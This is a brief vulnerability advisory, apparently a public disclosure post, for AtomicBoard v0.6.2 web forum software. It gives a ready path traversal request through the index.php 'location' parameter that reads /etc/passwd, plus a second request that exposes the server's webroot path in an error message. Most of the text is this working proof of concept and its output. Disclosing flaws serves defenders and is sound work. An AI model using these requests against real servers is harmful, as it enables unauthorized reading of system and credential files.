Menu
▾
▴
#1 Bugs
There is a vulnerability in the current version of
AtomicBoard
(AtomicBoard v0.6.2)
that allows an attacker tod retrieve files from the
webserver whit
webserver's ID, and
also the faliure exposes the path of the webroot.
File retrieving:
http://server/atomicboard/index.php?location=../../../../../../etc/passwd
RESPONSE:
Complete contents of the especified file.
Path Disclosure:
http://server/AtomicBoard-0.6.2/index.php?location=anything
Class.TemplateEngine::loadFile: file not found
(/www/webs/groovy.no-ip.com/AtomicBoard-0.6.2/include/anything)
